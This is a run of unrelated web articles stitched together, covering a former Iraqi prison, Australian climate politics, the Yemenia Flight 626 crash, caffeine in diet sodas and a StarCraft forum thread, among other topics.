“ To this day , it carries a stigma . It 's one of the reasons we have n't refurbished it and used it as a detention center , because of the history . ”
Political dissidents and enemies of the state were brought here , those who did n't “ serve Saddam. ” Interrogation , beatings and inhumane living conditions were part of daily life .
Soldiers from the 2nd Armored Cavalry Regiment arrived in August 2003 and discovered torture devices still in place , Rosson said . Outside , along a narrow corridor on the building 's interior , prisoners were allegedly chained to the floor in awkward , uncomfortable positions .
“ Speculation is they 'd keep them there for extended periods , ” he said . “ That was their idea of giving them outdoor time . ”
No name was attached to the prison . It was n't designed for long-term confinement , but some wound up staying for a decade or longer , according to Rosson , citing thousands of files — some dating to 1961 — found in the compound 's archives building after the fall of Baghdad .
“ Just knowing the regime , they could have been completely truncated charges to hold people for years , ” he added .
Most of the buildings on what is now called FOB Loyalty had some form of a holding cell or cage , even the hospital , where Army officials believe chemical interrogation may have taken place .
Rosson said Chinese laborers built all the facilities , including the prison . After construction , Saddam charged them with espionage and they became its first occupants . Cantonese is scribbled on the walls of many cells .
“ We have no idea when that took place and it 's uncertain how many Chinese there were . It 's believed they spent many years there and died in the prison , ” Rosson said . “ Apparently , they knew too much to go back home . ”
Arabic phrases also are carved into cell doors and walls , though it 's unclear what the statements say .
The prison , partially damaged during the war 's “ shock and awe ” phase — when U.S. planes took out the security complex 's headquarters and operations center — could hold about 500 people .
Hayder Abdul-Nabi said two of his brothers were inmates . One spent seven years and then did 10 more at Abu Ghraib . His crime ? He lost a pistol while serving in the Iraqi security forces .
“ We did n't know anything about [ what happened to ] him for seven years , ” Abdul-Nabi said , conceding he was hesitant to even go inside the prison during a recent tour . “ The Iraqi people are very scared of this place . They 'd kill people here by pouring acid on them . ”
Darkness grips Loyalty each night , as base officials keep lights to a minimum for security reasons . It 's perhaps a fitting reminder to those outside the wire of what the place once represented .
“ The base still has an eerie quality to it and certainly among the Iraqis , ” Rosson said . “ They know the prison is n't used for anything anymore , but it still puts fear in their hearts . ”
The use of robotics and artificial intelligence in marine technology will be the theme of Marine-i 's Discovery Room event next week .
Marine-i is an EU-funded scheme that provides support for the marine technology sector in Cornwall and the Isles of Scilly .
Its Discovery Room events are designed to draw together the latest thinking and expertise on a specific theme of marine technology , delivered in a series of short presentations and followed up by interactive workshops and Q & A sessions .
Simon Cheeseman is sector lead on Wave & Tidal Energy at the Offshore Renewable Energy ( ORE ) Catapult and is lead organiser for the event . He said : “ This is a fantastic opportunity for businesses to get up to speed on the newest developments in robotics and artificial intelligence and the many rapidly emerging opportunities in the marine sector .
“ This is a dynamic and diverse sector that is creating exciting opportunities for innovative businesses of all sizes . Not only will delegates hear from leading experts in the field , they will also be able to make valuable new contacts who could help accelerate new business ideas to market . ”
Speakers for the event include market-leading companies such as Cornwall-based TouchByte and Autonomous Systems developer SEICHE , as well as experts from the University of Exeter and Plymouth University . ORE Catapult will discuss the challenges involved and Innovate UK will talk about national funding opportunities . There will also be interactive exhibits and innovative technologies on display .
Attendance to the event which will take place at Tremough Innovation Centre on Wednesday , November 22 is free . For more details and to book a place , click here .
THQ showed off Warhammer 40,000 : Space Marine once again but this time the demo was n't playable . It was a lot more polished visually compared to what I saw last time , otherwise I wo n't reiterate much since you can simply read my last preview . The basic is that you 're a super powered solider and combat is pretty seamless between the third-person shooting and melee action .
Developer Relic Entertainment did at least show off a one new thing : jetpacks ! The Space Marines were able to equip jetpacks in the particular level being shown off and saw the main character flying around to get to enemies located higher up in the level .
You can expect Warhammer 40,000 : Space Marine to be released September 6 on the Xbox 360 , PlayStation 3 and PC . There 's going be a collector 's edition you can pick up as well which will include a 10 '' replica Purity Seal , hardback art book , soundtrack and 25 foiled character information cards . The CE version of the game will run $ 79.99 .
Check out the new developer diary and screens in the gallery . We 'll have more hands-on impressions come E3 .
You are logged out . Login | Sign up
Click to open photo gallery :
'Inconvenient fact ' : Fielding courts climate change rebels
Updated
Family First Senator Steve Fielding has written to senators on both sides of politics urging them to demand more proof from the Government that carbon emissions are the main driver of climate change .
Senator Fielding remains unconvinced that human activity is causing climate change and says there is evidence to show that over the past 15 years global temperatures have not risen in line with escalating carbon emissions .
His letter to senators appeals to them to consider the issue before casting their vote , which he says is too important to take along party lines .
He also believes there are Labor senators who do not agree that carbon emissions are responsible for climate change .
`` There are a number of them I believe that also are n't convinced that carbon dioxide is the major cause of climate change , and that 's the reason why I 'm writing to both Labor senators and Liberal senators , '' he told ABC News Online .
`` I would say that there are , on both sides of Parliament , those people who do n't believe that carbon dioxide is the major driver of climate change .
`` So what I 'm doing is asking each senator to consider an inconvenient fact ; the issue of air temperatures and why they have n't risen over the last 15 years . ''
In June Senator Fielding met with climate change scientists and sceptics during a fact-finding trip to the USA .
On his return he met with Australia 's chief scientist Penny Sackett , but says she failed to convince him that human activity is pushing up global temperatures .
However , despite his doubts the senator says he still has not decided how he will vote on the legislation , which is due before the Senate in August .
But he maintains he is not a climate change sceptic , and attended a breakfast speech by climate change guru Al Gore this morning .
The Government wants its emissions trading legislation passed before the Copenhagen talks , but its future is uncertain .
Late last week Prime Minister Kevin Rudd said he was pessimistic that an international deal on global emissions would be struck at talks in Copenhagen in December .
Senator Fielding says that only strengthens the case for Australia to hold off on an emissions trading scheme until other major economies act .
The Coalition also wants to wait until after December .
The Greens , who hold the balance of power with Senator Fielding and Independent Senator Nick Xenophon , will vote the scheme down unless emissions reduction targets are dramatically lifted .
The Government has committed to emissions cuts of between 5 to 25 per cent of 2000 levels depending on the strength of agreement reached at the Copenhagen talks .
Topics : emissions-trading , climate-change , government-and-politics , federal-government , australia
First posted
And the state officials decided last week to fine the federal government for missing the deadline to remove radioactive waste .
Idaho plans to fine the federal government $ 3,600 a day for missing a deadline to remove 900,000 gallons of liquid nuclear waste from tanks at a southeast Idaho nuclear facility , state officials said .
The state Department of Environmental Quality said it rejected a request for another extension from the U.S. Department of Energy to go past the Dec. 31 deadline to remove the radioactive waste at the Idaho National Laboratory .
Idaho officials tell the Post Register that three 50-year-old tanks are no longer supposed to be used for storage under federal laws governing hazardous waste .
“ Although DOE has had many years to complete this milestone , DOE has failed to initiate and complete treatment of the liquid wastes in the tanks or construct new tanks , ” said DEQ 's Hazardous Waste Compliance Manager Natalie Clough in a letter Tuesday to Richard Provencher , manager of DOE 's Idaho Operations Office . “ Completion of this work is a priority of the ( DEQ ) , and further delays are of critical concern . ”
The state said fines will increase to $ 6,000 a day if the waste is n't gone by July 1 .
Department of Energy spokeswoman Danielle Miller said the agency is reviewing the notice of violation it received . She declined to make additional comments .
The 890-square-mile nuclear facility in southeastern Idaho is known as the place where nuclear energy generated electricity for the first time , in 1951 . During the Cold War , the site also became home to millions of tons of nuclear waste generated at sites in other states .
The facility sits atop the Eastern Snake Plain Aquifer , and state officials going back decades have expressed concern about potential contamination .
Clough said the aging tanks containing the liquid nuclear waste do n't meet current regulatory standards , such as a secondary containment system . But Clough said there 's no immediate concern about the tanks leaking .
The Department of Energy built a facility called the Integrated Waste Treatment Unit to turn the liquid waste into a powder . But the facility has continued to run into problems trying to get beyond the testing phase . In December , though , officials said operators had better test results . But it 's still unknown when the liquid waste might be removed from the tanks .
“ We 've always been very clear that meeting these treatment goals is a state of Idaho priority , ” Clough said .
Courtesy : Washington Times
Palestinians throw stones at Israeli forces in the Old City of Hebron on March 1 , 2013 . ( AFP/Marco Longari , File )
BETHLEHEM ( Ma'an ) -- Five US tourists who mistakenly entered an area of Hebron in the occupied West Bank and were attacked by Palestinians were given refuge in the home of a local man .
Fayez Abu Hamdiyeh told Ma'an that he saw what he believed to be five Israeli settlers running away from a group of Palestinians in the Mt . Jowhar area in Hebron , when he let them into his home in order to protect them .
According to Israeli media , the tourists , who were all Yeshiva students , came under attack in Hebron while on their way to a religious site in the city , known by Jews as Tomb of the Patriarchs , and revered as the Ibrahimi Mosque by Muslims .
The five told Abu Hamdiyeh that they had entered the area by accident before their car was torched and stones were thrown at them , leaving two lightly injured , he said . Abu Hamdiyeh then called the police from one of their phones , who arrived at the scene and took them from his home . Abu Hamdiyeh then called the police from one of their phones , who arrived at the scene and took them from his home . Israeli forces then raided the area and clashes broke out before the forces fired tear gas , rubber coated bullets , and stun grenades at Palestinian youths . Israeli forces then raided the area and clashes broke out before the forces fired tear gas , rubber coated bullets , and stun grenades at Palestinian youths . No injuries were reported . No injuries were reported . An Israeli army spokesperson told Ma'an that the tourists had `` accidentally entered Hebron '' in their private vehicle , when Palestinian residents threw rocks and a Molotov cocktail at the car . An Israeli army spokesperson told Ma'an that the tourists had `` accidentally entered Hebron '' in their private vehicle , when Palestinian residents threw rocks and a Molotov cocktail at the car .
Americans love to complain about the pitiable state of our once-great rail system and wonder why our locomotives are stuck in the past . I mean , you can zip between Wuhan and Guangzhou , China , at 220 mph . Japan 's Shinkansen system tops 186 mph . The French TGV can blaze across the countryside at more than 200 mph . Yet the Acela train , the pride of Amtrak , hits a ho-hum 150 mph at top speed and maintains that for only a few minutes between New York and Boston .
Outside the Northeast corridor , few people even consider train travel . America has the worst rail system in the developed world , right ?
Well , sort of .
U.S. trains may not be the best at moving people , but they 're great at moving everything else . More than 40 percent of U.S. freight miles are done by rail , compared with less than 15 percent in Europe , according to Christopher Barkan , a professor who heads the railroad engineering program at the University of Illinois at Urbana-Champaign . In terms of carbon footprint , that 's a great statistic . The railroad industry likes to brag that it can carry a ton of freight 436 miles on a single gallon of diesel -- three times better than a truck can do -- but even that is just an average . Some freight lines manage 517 miles .
The problem is that freight track and high-speed track are built with completely different considerations in mind , making it difficult for a country to maintain both a world-class freight network and a first-rate passenger system .
Freight track is familiar to most Americans . The two steel rails are connected by hardwood crosses , known as ties to railroad aficionados . A bed of crushed stone , called ballast , undergirds the ties . This arrangement is extremely durable , and it needs to be . Freight trains weigh several times as much as their high-speed , passenger-carrying cousins . A fully loaded freight car weighs about 150 tons , compared with just 42 tons for the average car in a French high-speed train and even less in Japan .
Freight track can take the punishment of rumbling freight trains for decades with little maintenance , but that does n't mean the track does n't experience little changes . The wheels push out against the rails , increasing the gauge . ( That 's the distance between the rails . ) Other forces tend to create horizontal waves or vertical ripples along the track .
Curved sections are a special problem . Think of a NASCAR track . The road is banked around the curves , with the outside of the track higher than the inside to prevent the cars from sliding into the wall . Engineers do the same thing with curved train tracks . In sections where the tracks are banked , the train 's weight falls more heavily on the inside rail . Over time , it drops lower than it should , making the tracks uneven .
A stout freight train , which typically cruises along at about 60 mph , can handle those changes in track conditions . But modern passenger trains that streak over rails at more than 200 mph ca n't . Everything has to be precise , or the train could derail with disastrous results .
Most high-speed passenger trains travel along a completely different medium called slab track , in which the rails are bolted into sections of concrete . The concrete holds the rails still , assuring safe travel at high speeds , but it simply ca n't handle the tonnage of a freight train . It 's also extremely expensive to build , about 50 percent more than typical freight tracks .
The layout of our tracks is also a major problem . U.S. rails run across roadways at lots of places . Because a collision between a car and a super-fast train would be catastrophic for everyone involved , high-speed rail simply can not cross roadways .
Our system of rails is also way too curvy for high speeds . Because 19th-century transit engineers did n't envision trains traveling much more than 60 mph , they built lots of bends into the tracks . High-speed trains have to slow down substantially to negotiate even a banked curve . But in order to straighten out track around population centers -- precisely the places where high-speed rail is needed -- government would have to extensively use its power of eminent domain to take private property , which would be expensive and politically unpopular .
Hillary Clinton 's campaign chairman , John Podesta , may have violated federal law when he failed to fully disclose details surrounding his membership on the executive board of Joule Unlimited and the “ 75,000 common shares ” he received . The energy company accepted millions from a Vladimir Putin-connected Russian government fund .
Podesta joined the executive board of Joule Unlimited Technologies — a firm partly financed by Putin 's Russia — in June 2011 and received 100,000 shares of stock options , according to an email uncovered by WikiLeaks . Podesta 's membership on the board of directors of Joule Unlimited was first revealed in research from Breitbart News Senior Editor-at-Large and Government Accountability Institute ( GAI ) President Peter Schweizer .
Podesta never disclosed his position on Joule Unlimited 's board of directors and failed to include the stock payout in his federal financial disclosures , as required by law , before he became President Obama 's senior adviser in January 2014 — a possible violation for federal law , according to the Daily Caller News Foundation 's Investigative Group ( TheDCNF ) .
“ Well Podesta should certainly have been more upfront in filling this out . Clearly , it should have been fully disclosed , ” Craig Holman , a lobbyist Public Citizen told TheDCNF . “ That 's the point of the personal financial disclosure forms , especially for anyone entering the White House . ”
“ If the transfer of stock took place , it had to be disclosed , ” added former U.S. Attorney Joseph DiGenova in an interview . “ If he did n't , clearly it 's a violation . ”
Indeed , Podesta had his Joule shares of stock options transferred to his daughter , Megan Rouse .
“ Full transfer request , with Megan 's signature attached , ” Podesta 's assistant Eryn Sepp wrote to him on December 31 , 2013 — just weeks before Podesta joined the Obama administration .
A January 3 , 2014 , letter revealed that Podesta designated his daughter 's Dublin , California , residence as the address for Leonidio Holdings LLC , the Delaware-based holding company that Podesta used to transfer his shares in Russian-connected Joule Global Holdings .
Rouse is listed as “ managing member ” of Leonidio Holdings LLC , according to financial documents .
TheDCNF reports that Podesta was required by law to disclose the aforementioned financial information . His failure to do so may have been illegal :
The Schedule B section of the federal government 's form 278 which — requires financial disclosures for government officials — required Podesta to “ report any purchase , sale or exchange by you , your spouse , or dependent children … of any property , stocks , bonds , commodity futures and other securities when the amount of the transaction exceeded $ 1,000. ” Podesta 's form 278 Schedule B is blank regarding his receipt of any stock from any company .
“ I think in this case where you 're talking about foreign interests and foreign involvement , the collateral interest with these disclosure forms is put in the forefront of full disclosure of any foreign interest that you may have , ” said Ron Hosko , a former FBI assistant director .
“ It 's a troubled question if you deliberately omit this information on the form , ” Hosko said , adding that Russian funding could have easily “ become a counterintelligence concern for America . ”
Last week , Rep. Louie Gohmert called for a federal probe into Podesta 's Russian ties .
The new revelations come amid a partisan push to link President Donald Trump and his aides to Russian influence-peddling and collusion during the presidential campaign .
Read The Daily Caller News Foundation 's Investigative Group 's report here .
Follow Jerome Hudson on Twitter @ jeromeehudson .
Kellyanne Conway , who spearheaded President Trump 's campaign for the White House and currently works as his counselor , said some mighty confusing things about feminism at the conservative gathering CPAC last week , and it 's time to do a little unpacking . As well as lambasting people for their `` negativity about women in power , '' she noted to the audience , “ It 's difficult for me to call myself a feminist in a classic sense because it seems to be very anti-male , and it certainly is very pro-abortion , and I 'm neither anti-male nor pro-abortion . '' Facepalm .
The part of her comments I 'm going to deal with here is the anti-male segment ; whether or not feminists can also oppose abortion is a complicated issue all of its own , with significant differences about the topic within the movement itself ( I personally do not believe pro-life feminism is possible , but that 's only individual opinion ) . No , what concerns me here most is that yet again , a white blonde lady has stood up and said that she does n't think feminism is sufficiently nice to dudes , and why that false idea is now over a hundred years old ( and extremely tired , might I add ) .
We 've dealt with this before when Taylor Swift said it , and though I hope that the Women 's March movement and other demonstrations of the power and political clout of women might lessen its frequency , I 'm not without skepticism . Let 's have a look at why anti-feminists came up with the anti-male stereotype , and how it 's stuck around for so long .
Anti-Feminism Has Mischaracterized The Movement For A Long Time Collection Of Dr Joan Iverson Let 's talk the history of anti-feminism . While people against female equality in principle have existed for an extremely long time , many sentiments that now seem common to opponents to feminism really blossomed in 1792 , when Mary Wollstonecraft published her Vindication Of The Rights Of Women in England . The tone of disapproval , notes Valerie Saunders in Eve 's Renegades : Victorian Anti-Feminist Female Novelists , was personal , indicating that the only reason Wollstonecraft felt the way she did about women 's equality was because she was , in private , not actually a respectable woman at all , and certainly not a sensible one . The British Critic asked in 1803 , `` Did [ Mary Wollstonecraft ] not , in private life , disdain almost every regulation by which society is held together , and erect her own caprice , inclinations , and passions as the unerring standard of right ? '' The idea of feminism as somehow not respectable was one thing , but the concept of it as being fundamentally unbalanced and unnatural was another . And that was another common theme , unfortunately . The idea of women standing up loudly and demanding their rights was anathema to critics of the time , because it was `` unfeminine . '' Women were meant to confine themselves to home and hearth , not be out agitating and making political speeches ; that was usurping male space , and the logical leap to seeing women as `` anti-male '' because of it was a small one . The 19th century anti-feminist journalist Eliza Lynn Linton coined the term `` shrieking sisterhood '' for what she perceived as `` hysterical '' political attempts that `` frighten the world , '' saying that feminists should instead try to proceed in silence .
The Suffragettes Were Deemed `` Ugly '' & `` Bad Mothers '' Collection of Dr Joan Iverson The suffrage movements were the ones that saw the real flowering of anti-feminist rhetoric , as feminists were seen to threaten central parts of female identity related to femininity and motherhood . The whole `` anti-male '' label really took hold in the popular press in this period , showing sympathetic fathers at home nursing abandoned offspring while mothers went off to do irresponsible things like March and picket for their own rights . That was if they were pictured as married at all ; the `` shrieking sisterhood '' were also depicted as chronically ugly , unhappy about their rights and roles because they were embittered about their inability to have a `` natural '' woman 's position in a family . Anti-feminists also took feminism to be a threat to values considered by them to be fundamental to gender values ; a 1918 anti-suffrage organization in America declared itself `` Dedicated To The Defence Of Womanhood , Motherhood , The Family & The State . '' Feminism , the argument went , challenged the traditional order that required male heads of household and female mothers and nurturers , and was therefore a threat to both genders .
Yemenia Flight 626 was an Airbus A310-324 twin-engine jet airliner , operated by Yemenia , flying a scheduled international service from Sana ' a , Yemen , to Moroni , Comoros , that crashed on 30 June 2009 at around 1:50 am local time ( 22:50 on 29 June , UTC ) while on approach to Prince Said Ibrahim International Airport , killing all but one of the 153 passengers and crew on board . [ 1 ] [ 2 ] The sole survivor , 14-year-old Bahia Bakari , was found clinging to wreckage , after floating in the ocean for thirteen hours . [ 3 ] [ 4 ] [ 5 ] Bakari was discharged from the hospital on 23 July 2009 . [ 6 ]
The final report on the incident concluded that the crew 's inappropriate flight control inputs led to an aerodynamic stall . The report also noted that the crew did not react to the warnings being issued by the aircraft . [ 7 ]
Aircraft [ edit ]
The aircraft was an Airbus A310-324 twin-engine jetliner , registration 7O-ADJ , manufactured in 1990 as serial number 535 . It was in service for 19 years and 3 months , and had accumulated 51,900 flight hours on about 17,300 flights by the time of the accident . [ 1 ] [ 8 ]
Owned by the International Lease Finance Corporation ( ILFC ) the aircraft first entered service with Air Liberté on 30 May 1990 . After leases to successive operators it was leased to Yemenia in September 1999 , re-registered 7O-ADJ and remained in service with them until the accident . [ 9 ]
Dominique Bussereau , the French Minister of Transport , reported that the plane was inspected in 2007 by the French Direction Générale de l'Aviation Civile and found to have a number of faults ; since then , however , the aircraft had not returned to France , so it was never again inspected by the same authority . [ 2 ] [ 10 ]
Flight history [ edit ]
Most of the passengers originated from Paris , where they had boarded Yemenia Flight 749 , operated using an Airbus A330-200 . There was a stopover at Marseille Provence Airport in Marseille , France , where additional passengers and crew boarded . After arriving at Sana ' a International Airport in Sana ' a , Yemen , passengers transferred to an Airbus A310 for Flight 626 , which was due to arrive at Prince Said Ibrahim International Airport in Moroni , Comoros , at 2:30 am local time on 30 June . [ 11 ]
The flight crew members , all Yemeni , were Captain Khalid Hajeb , First Officer Ali Atif , and Flight Engineer Ali Salem . Of the cabin crew , three were Yemeni , two were Filipino , two were Moroccan , one was Ethiopian , and one was Indonesian . [ 12 ]
Accident [ edit ]
The crash occurred off the north coast of Grande Comore , Comoros , in the Indian Ocean several minutes from the airport . [ 13 ] The aircraft was on final approach to the airport , and would land on runway 20 , via turning at the 5.2 DME . However , the aircraft continued past the DME , then made a left turn towards the north , going off course . The aircraft then stalled and crashed into the sea . [ 14 ] An unnamed United Nations official at the airport said that the control tower had received a notification that the plane was approaching to land before losing contact . [ 15 ] There are unconfirmed reports that the plane had crashed after an aborted landing . There had been several days of inclement weather in the region at the time of the accident . [ 2 ] An unseasonably strong cold front had moved through the Comoros Islands , bringing winds gusting to 64 km/h ( 40 mph ; 35 kn ) and conditions favorable for light to moderate turbulence . [ 16 ] Yemeni civil aviation deputy chief Mohammed Abdul Qader said the wind speed was 61 km/h ( 38 mph ; 33 kn ) at the time the aircraft was landing . [ 1 ]
Yemeni officials did not suspect foul play . [ 17 ] This was the third accident for Yemenia ; the previous two were runway incursions with no fatalities , although one aircraft was written off . [ 18 ]
Search and recovery [ edit ]
According to the Comoran police , the nation possesses no sea rescue capabilities . [ 19 ] Two French military aircraft and a vessel began the formal search for Flight 626 . [ 2 ] They were sent from Réunion and Mayotte . [ 11 ] The Comoros consists of three volcanic islands , Grande Comore , the main island ; Anjouan ; and Moheli . It is located in the Mozambique Channel , 190 miles ( 310 km ) northwest of Madagascar and a similar distance east of the African mainland . [ 20 ] The wreckage was spotted off the coast of the town of Mitsamiouli , including a few bodies and large amounts of floating debris in the ocean . [ 21 ]
Survivor found [ edit ]
A 14-year-old girl , Bahia Bakari , was rescued after being spotted clinging to a piece of debris among bodies and wreckage . [ 3 ] [ 4 ] [ 22 ] She was picked up during rescue efforts by local fishermen and speedboats sent by authorities on Grande Comore . [ 23 ] She had been holding on to wreckage for 13 hours . Bakari had been traveling with her mother , who did not survive . [ 5 ] Bahia was released from the hospital in Paris on 23 July 2009 . [ 6 ]
Continued searches [ edit ]
Five bodies were recovered at the same time that the lone survivor was rescued . [ 1 ] Another 22 bodies were recovered from Mafia Island in Tanzania during the second week of July 2009 , and transferred to hospitals in Dar es Salaam . [ 24 ]
On 5 July 2009 , the signals from the aircraft 's flight recorders were detected . [ 25 ] The French oceanographic vessel Beautemps-Beaupré arrived at the Comoros on 15 July 2009 , and by 23 July 2009 had completed a mapping of the ocean floor around the crash area , which helped pinpoint the exact location of the recorders . [ 26 ] [ 27 ] Due to the great depth of the recorders ' current location , the French navy had announced that it would employ underwater robots for the recovery operation , which began in August 2009 . [ 27 ] The flight data recorder was eventually recovered on 28 August from the Indian Ocean at a depth of 1,200 metres ( 3,900 ft ) , while the cockpit voice recorder was recovered on 29 August . [ 28 ] [ 29 ]
Investigation [ edit ]
The Agence Nationale de l'Aviation Civile et de la Météorologie ( ANACM ) of the Comoros was in charge of the investigation . [ 30 ] The Bureau d'Enquêtes et d'Analyses pour la Sécurité de l'Aviation Civile ( BEA ) sent an investigative team , accompanied by Airbus specialists , to assist in the investigation of the causes . [ 31 ] Yemen also sent a technical team to Moroni , while a committee , headed by the Yemeni Minister of Transport , has been formed . [ 32 ] The BEA noted that due to corrosion damage on the memory cards , not all of the data from the CVR could be recovered . [ 33 ] The preliminary findings of the investigation point to pilot error as the cause of the accident . There were objections from the Comoros and Yemeni authorities to suggestions that pilot error was the cause . [ 34 ] In November 2009 , Yemenia announced that they were looking for a third party to investigate the accident , accusing the French of attacking Yemenia `` day and night '' and of `` harassment '' . Yemenia stated that the investigation was `` affecting the reputation of Yemen '' . [ 35 ] In 2011 the BEA criticized the Comorian authorities , saying that they are not releasing the report in a timely enough manner . [ 36 ]
On 25 June 2013 , the Comoros investigative commission director Bourhane Ahmed Bourhane announced that `` the accident was due to inappropriate action by the crew '' during `` an unstabilised manoeuvre . `` [ 37 ] A group of victims ' family members called for a demonstration in Paris on 28 June 2013 to protest the final report . [ 38 ] According to the Yemen Post , Yemen suspects that the plane was taken down , despite a lack of any evidence indicating foul play . [ 39 ]
The investigation determined that the accident was caused by the inappropriate actions of the crew that led to a stall that was not recovered from . The approach was unstabilized , triggering various alarms for ground proximity , aircraft configuration and approach to stall . The crew was focused on navigating , were stressed , and did not respond adequately to the different alarms . Contributing to the accident were the windy weather conditions , a lack of training , the lack of a crew briefing before the flight , and a failure to correctly respond to the pull up alarm . [ 40 ] :72
Passengers and crew [ edit ]
There were 142 passengers and 11 crew aboard . Most passengers are believed to be either Comoran or French nationals . There were also citizens of Canada , Ethiopia , Indonesia , Morocco , Israeli Arabs , the Philippines and Yemen on board the plane . [ 41 ] An airport source has claimed that 66 of the passengers held French citizenship , but many of those could be dual French-Comoran citizens . [ 2 ] Many may have been residents of Marseille , a French city with a large Comoran population , headed home for a vacation ; the week of the accident marks the beginning of summer vacations for French school children . [ 1 ] The two other persons on board were said to be Europeans . [ 2 ] [ 21 ] [ 42 ] The three flight crew members were all Yemeni . Of the cabin crew , 3 were Yemeni , 2 were Filipino , 2 were Moroccan , 1 was Ethiopian , and 1 was Indonesian . [ 12 ]
Controversy [ edit ]
The French Transport Minister Dominique Bussereau said that France banned this plane from its territory several years ago because `` we believed it presented a certain number of irregularities in its technical equipment . `` [ 43 ] However , the Yemeni Transport Minister Khaled Ibrahim Alwazir declared the plane was in line with international standards and that `` comprehensive inspection '' had been undertaken in Yemen with experts from Airbus . [ 23 ] The Comoran community in France marched in Paris , in tribute to the victims of Flight 626 . [ 44 ] They also disrupted Yemenia flights , protesting in French airports against the airline 's safety record and preventing passengers from boarding or checking-in . As a result , Yemenia canceled indefinitely all its flights to and from Marseille [ 45 ] and all additional flights between Sana ' a and Moroni . [ 46 ]
Burial and repatriation of bodies [ edit ]
As of Tuesday 1 December 2009 , remains of nine crew members had been retrieved and arrived in Sana ' a . The crew members found were Captain Khalid Hajeb , First Officer Ali Atif , the three Yemeni cabin crew members , the two Moroccan cabin crew members , and the Ethiopian cabin crew member . One cabin crew member , Hamdi Wazea , was buried in Sana ' a , while the other Yemenis who were found were buried in Aden . The bodies of the Moroccans were sent to Morocco , while the Ethiopian was sent to Addis Ababa . The crew members who had not been found included Yemeni engineer Ali Salem , the two Filipino cabin crew members , and the Indonesian cabin crew members . In the last two days leading to 1 December 54 bodies were buried in Moroni . [ 12 ]
See also [ edit ]
`` I lost 65+ pounds using your calorie calculator '' Try if it 's free
The 10 Most Caffeinated Diet Drinks
Did you know that diet sodas have more caffeine than regular soda ?
Diet Coke has 46.5mg caffeine compared to regular Coke that has 34.5mg . That 's a thirty per-cent increase !
Here are the 10 most caffeinated diet soft drinks – and they are nowhere near the levels of caffeine in Starbucks drinks .
Diet Pepsi Max
Per 12oz can : 69mg caffeine
A can of regular Pepsi-cola contains 38mg caffeine .
Diet Sundrop
Per 12oz can : 69mg caffeine
Sun Drop is a brand of citrus soda drink from Cadbury-Schweppes . The level of caffeine in the Diet version came as a complete surprise – but then – even the regular version has 63mg in a 12oz can . Note : regular can be displayed .
Diet Mountain Dew
Per 12oz can : 55mg caffeine
Mountain Dew is one of the most popular citrus soft drinks . Both diet and regular have the same amount of caffeine . In countries outside the USA – Mountain Dew has either reduced amounts of caffeine ( or no caffeine at all ) .
Pepsi ONE
Per 12oz can : 54mg caffeine
Pepsi ONE is a very similar formulation to Diet Coke with Splenda – although Pepsi ONE contains significantly more caffeine .
Diet Cheerwine
Per 12oz can : 48.1mg caffeine
Diet RC Cola
Per 12oz can : 47.3mg caffeine
Royal Crown ( RC ) colas have been around for a long time and are currently owned by Cadbury Schweppes . As in the case of Diet Coke – here the diet version has more caffeine than the regular RC Cola . 2
TaB
Per 12oz can : 46.5mg caffeine
TaB ( from Coca-cola ) is one of the oldest diet or sugar-free soft drinks around . It has more caffeine than Diet Coke
Diet Coke
Per 12oz can : 46.5mg caffeine
Diet Coke has significantly more caffeine in it than regular coke ( 34.5mg ) .
Diet Sunkist Orange Soda
Per 12oz can : 41.5mg caffeine
Contains slightly more than the regular version of Sunkist . Who would have thought that Orange Soda was caffeinated ?
Diet Dr Pepper
Per 12oz can : 41mg caffeine
Contains the same amount as regular Dr Pepper .
How Much Caffeine in Instant Coffee ?
According the USDA – 1 rounded teaspoon of instant coffee powder contains 57mg of caffeine . ( source ) .
What about Diet Coke Plus ?
The vitamin-filled Diet Coke Plus contains the same amount of caffeine as Diet Coke .
Diet Pepsi ?
Did n't even make it to this list . Diet Pepsi has 36mg caffeine in a 12oz can .
Sources : The CaffeineInformer caffeine database and caffeine in citrus soda , along with PepsiCo , Coca-cola , Sundrop .
Gihi Profile Joined September 2011 384 Posts Last Edited : 2012-03-06 23:54:15 # 1
Since I am interested in hearing speculations and opinions I 'm posting this here , not to cause an upstir or something .
As some of you know earlier today Incredible Miracle uploaded some new pictures of Matt `` looknohands119 '' his visit to the teamhouse .
On one of the photos , an unknown player is visible , wearing the IM team jersey , but his face is blurred out . People are speculating it 's Flash or Bisu but I personally find this hard to believe although he does have the same arm size as Flash , but a different hair color if I 'm not mistaken .
Photos :
+ Show Spoiler +
On March 07 2012 06:00 Jono7272 wrote :
From behind :
+ Show Spoiler +
From behind :
Another one from behind :
+ Show Spoiler +
Does any of u have information about the identity of this player ? Or just ideas/rumors ^^
Gihi
Current theories/ideas/statements
+ Show Spoiler +
- He looks like flash but Flash would n't leave KT quietly , hes worked hard there for years .
- He looks like Bisu but Bisu his hair does n't have black roots on the back of his head as proven by someone with a recent video from Bisu
- Might be a random/B teamer but why would they blur him out ?
- Plays protoss most likely as seen in the photos
- Notice his long , thin arms
- A regular member who does n't want to be on photo ( It 's inevitable to have ur picture taken as a member from such an elite & famed team as IM , so this seems unlikely to me personally )
- Losira is a bit more pudgy someone says , he has short hair now & he plays zerg normally
- Lyn does n't have arms that size
- He seriously does look a lot like Flash lol
- Anyppi , ex KT rolster player who thought about switching
- KT player Wooki
-
I could not find another thread about this.Since I am interested in hearing speculations and opinions I 'm posting this here , not to cause an upstir or something.As some of you know earlier today Incredible Miracle uploaded some new pictures of Matt `` looknohands119 '' his visit to the teamhouse.On one of the photos , an unknown player is visible , wearing the IM team jersey , but his face is blurred out . People are speculating it 's Flash or Bisu but I personally find this hard to believe although he does have the same arm size as Flash , but a different hair color if I 'm not mistaken.Photos : Another one from behind : Does any of u have information about the identity of this player ? Or just ideas/rumors ^^GihiCurrent theories/ideas/statements
BearDK Profile Joined March 2011 Denmark 101 Posts Last Edited : 2012-03-06 20:55:19 # 2
edit : btw . you knowing stuff about the size of Flash ' arm is pretty disturbing to me Well , if you look at what seems to be his monitor , you can tell that he is playing protoss.edit : btw . you knowing stuff about the size of Flash ' arm is pretty disturbing to me
0ne Profile Blog Joined March 2011 Spain 2464 Posts Last Edited : 2012-03-06 20:55:09 # 3 Pretty sure it 's Bisu
mrtomjones Profile Joined April 2011 Canada 4017 Posts # 4 I doubt it is someone like Flash or Bisu . They wont come till SC2 till either HoTS or BW dies/becomes unprofitable .
dragonborn Profile Joined January 2012 3757 Posts # 5 some random B-teamer .
Intact Profile Joined September 2010 Sweden 587 Posts # 6 On March 07 2012 05:54 0ne wrote :
Pretty sure it 's Bisu
If thats correct its both awsome and really sad at the same time . If thats correct its both awsome and really sad at the same time .
